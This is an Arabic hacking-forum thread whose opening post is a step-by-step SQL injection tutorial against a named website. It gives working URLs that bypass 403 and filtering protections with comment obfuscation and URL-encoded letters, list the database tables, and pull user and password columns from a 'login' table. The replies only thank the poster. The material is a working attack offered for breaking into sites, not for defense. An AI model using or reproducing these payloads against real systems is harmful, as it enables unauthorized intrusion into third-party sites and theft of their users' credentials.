1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : AsSad HOmS | المشاهدات : 328 | الردود : 6
حالة الموضوع:
مغلق
  1. AsSad HOmS V • I • P

    الأنتساب:
    ‏15 مارس 2014
    المشاركات:
    39
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    30
    نظام التشغيل:
    windows 7
    بسم الله الرحمن الرحيم

    بعض مشكلة الفلترة والفوربدين تواجه هكرز في اختراق المواقع انشالله اليوم معنا حل كل هالامور مع شرح بسيط

    معنا هدا الموقع خلينا نجرب أستخراج عدد الاعمدة راح يعطينا فوربدين

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3
    *=== تحديد كود ===*

    التخطي راح يكون بالأمر التالي

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+group+by+1
    *=== تحديد كود ===*
    تمام هيك تخطينا الفوربدين

    عدد الاعدمة 3 اوك لهون شباب

    بدنا نطالع الجدوال

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+union+select+1,2,3
    *=== تحديد كود ===*
    عطنا الموقع ((Not Acceptable))

    اذا حاولنا وتخطينا بالطريقة العادية الفلترة

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+union+/*!select*/+1,2,3
    *=== تحديد كود ===*
    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+union+/*!12345select*/+1,2,3
    *=== تحديد كود ===*
    راح ناخد فوربدين هون انت راح تشد شعر راسك بس بسيطة

    حل بسيط معنا هادا الجدول بيعطنا كل حرف بالمقابل تخطي بالرموز

    [​IMG]

    راخ نشفير هدول :U = %55 T = %54

    الأمر بصير ((( +%55nion+/*!12345selec%54*/+1,2,3)))

    تمام منشوف الموقع

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+Union+/*!12345selecT*/+1,2,3
    *=== تحديد كود ===*
    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,3
    *=== تحديد كود ===*
    اشتغل منكمل حقن شباب

    منطالع اصدار القاعدة

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,version()
    *=== تحديد كود ===*
    طلع معنا فوربدين بعدين مع هل الحالة

    راح نتخطي بهل الطريقة

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,@@version
    *=== تحديد كود ===*
    طلع معنا ((Not Acceptable))

    التخطي راح يكون

    بالامر

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,@@GLOBAL.VERSION
    *=== تحديد كود ===*
    تمام طللع معنا الأصدار

    ((5.1.73-cll))

    هلأ بدنا نطالع table_name

    أمر استخراج

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,/*!12345table_name*/+from+information_schema./*!12345tables*/+limit+0,1
    *=== تحديد كود ===*
    خلينا نطالع اليوزر والباس شوفوا شو طلع معنا

    اليوز

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,/*!12345column_name*/+from+information_schema./*!12345columns*/+where+/*!12345table_name*/=0x6c6f67696e+limit+1,1
    *=== تحديد كود ===*
    الباس

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,/*!12345column_name*/+from+information_schema./*!12345columns*/+where+/*!12345table_name*/=0x6c6f67696e+limit+2,1
    *=== تحديد كود ===*
    طبعا لازم نتخطي الفلترة

    أمر استخراج اليوز
    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,user+from+login
    *=== تحديد كود ===*
    الباس

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,pass+from+login
    *=== تحديد كود ===*

    لهون انشالله الدرس حلوة ومفيد
     
  2. تــــركــــي DeveloPer Plus

    الأنتساب:
    ‏25 ابريل 2012
    المشاركات:
    180
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    يعطيك العافية وسلمت يداك ً:ُeُe6#:
     
  3. كاسر قلوب الهكر Developer

    الأنتساب:
    ‏20 أكتوبر 2014
    المشاركات:
    100
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    بارك الله فيك أخي[​IMG]رااااائع[​IMG]
     
  4. GO HacKer DeveloPer Plus

    الأنتساب:
    ‏16 يوليو 2013
    المشاركات:
    143
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    يعطيك العافيةة ..
    اخوي....
     
  5. jőŐőķєя Developer

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    56
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    طآلب , ثآنوي ..●
    الإقامة:
    في عالم لا يسكنه غيريُ
    نظام التشغيل:
    Linux
    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    يعطيك العآفية ..
     
  6. VB_Dev Developer

    الأنتساب:
    ‏21 أكتوبر 2014
    المشاركات:
    48
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    HTML5
    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    مشكووووووور ياغالي

    طرح رائع
     
  7. Ghost Libya Developer

    الأنتساب:
    ‏17 ابريل 2014
    المشاركات:
    69
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    windows 7
    Facebook:
    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    يعطيك العافية أخوي شرح ولا أروع
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة